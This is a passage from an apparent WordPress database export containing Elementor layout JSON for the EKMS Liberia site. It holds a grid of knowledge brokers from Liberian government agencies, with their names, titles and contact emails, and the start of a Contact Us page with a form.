\\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23296,3381,'_elementor_edit_mode','builder'),(23297,3381,'_elementor_template_type','wp-page'),(23298,3381,'_elementor_version','3.0.16'),(23299,3381,'_wp_page_template','default'),(23300,3381,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your 